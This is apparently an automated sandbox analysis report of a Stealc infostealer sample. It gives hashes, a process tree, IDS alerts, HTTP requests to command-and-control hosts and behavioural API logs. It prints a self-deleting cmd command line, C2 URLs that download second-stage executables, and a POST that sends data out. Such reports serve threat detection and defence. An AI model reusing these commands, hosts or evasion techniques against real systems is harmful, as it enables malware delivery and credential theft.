Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 24, 2024, 6:59 p.m.	Aug. 24, 2024, 7:03 p.m.

Size	206.5KB
Type	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`258229d6ad139e745a770eb9e0418310`
SHA256	`ddb51c81bbef639e7211b75c1309c0aeebadd37d70191ee1f2476866f5a6c274`
CRC32	`D306DE57`
ssdeep	`3072:cXBsnLVzDp+L9DP5Krjk828ZZnSzXpe2T8RqKVv8uLGT8OrSUdtNgYFFilBF8FKe:KWn+94s8pXGI2TM8XP7NFilBQjEO`
PDB Path	c:\56zm\xzd9\obj\Releas\Zaq1.pdbpdb
Yara	PE_Header_Zero - PE File Signature Antivirus - Contains references to security software Is_DotNET_EXE - (no description) IsPE32 - (no description)

66c8f17d5f1ae_selwq.exe#space "C:\Users\test22\AppData\Local\Temp\66c8f17d5f1ae_selwq.exe#space"
1492
- RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2076
  - cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22JKEGIDGDGH.exe"
    2552
    - test22JKEGIDGDGH.exe "C:\Users\test22JKEGIDGDGH.exe"
      2636
      - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2736
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit
        1676
        
        timeout.exe timeout /t 10
        2232
  - cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22CGCAKKKEGC.exe"
    2812
    - test22CGCAKKKEGC.exe "C:\Users\test22CGCAKKKEGC.exe"
      2896
      - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2996
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
t.me	A 149.154.167.99	149.154.167.99
steamcommunity.com	A 184.26.241.154	173.222.146.99

IP Address	Status	Action
116.203.10.69	Active	Moloch
147.45.44.104	Active	Moloch
149.154.167.99	Active	Moloch
164.124.101.2	Active	Moloch
184.26.241.154	Active	Moloch
46.8.231.109	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	Malware Command and Control Activity Detected
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	Malware Command and Control Activity Detected
TCP 46.8.231.109:80 -> 192.168.56.103:49163	2051828	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2044303	ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	Malware Command and Control Activity Detected
TCP 46.8.231.109:80 -> 192.168.56.103:49163	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	Malware Command and Control Activity Detected
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	Malware Command and Control Activity Detected
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 46.8.231.109:80	2044301	ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 46.8.231.109:80 -> 192.168.56.103:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.8.231.109:80 -> 192.168.56.103:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 46.8.231.109:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 46.8.231.109:80 -> 192.168.56.103:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2044302	ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 46.8.231.109:80 -> 192.168.56.103:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.103:49167 -> 147.45.44.104:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49180 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49181 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49181 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49189 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49189 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49189 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 149.154.167.99:443 -> 192.168.56.103:49191	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2044305	ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49167 -> 147.45.44.104:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 184.26.241.154:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2044306	ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 46.8.231.109:80	2044307	ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 149.154.167.99:443 -> 192.168.56.103:49182	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 116.203.10.69:443 -> 192.168.56.103:49187	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49190 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49189 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49181 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49180 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49184 184.26.241.154:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 6:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2024, 7 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 24, 2024, 7 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 24, 2024, 7 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0
IsDebuggerPresent Aug. 24, 2024, 6:59 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 24, 2024, 7 p.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 24, 2024, 7 p.m.	buffer: Waiting for 10 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 24, 2024, 7 p.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

c:\56zm\xzd9\obj\Releas\Zaq1.pdbpdb

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 24, 2024, 6:59 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://46.8.231.109/c4754d4f680ead72.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.44.104/prog/66c8f1817d261_valef.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.44.104/prog/66c8f1851766d_lename.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://steamcommunity.com/profiles/76561199761128941

Performs some HTTP requests (12 events)

request	GET http://46.8.231.109/
request	POST http://46.8.231.109/c4754d4f680ead72.php
request	GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
request	GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
request	GET http://147.45.44.104/prog/66c8f1817d261_valef.exe
request	GET http://147.45.44.104/prog/66c8f1851766d_lename.exe
request	GET https://steamcommunity.com/profiles/76561199761128941

Sends data using the HTTP POST Method (1 event)

request

POST http://46.8.231.109/c4754d4f680ead72.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 67 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00880000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00720000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00402000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00435000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00437000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 1492 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02312000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fc1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74471000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74451000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 region_size: 995328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x61e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74031000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7355c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7336b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732ca000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c42000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73253000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00900000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72901000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72902000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x745e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74571000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74481000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73441000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73241000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731e1000 process_handle: 0xffffffff	1
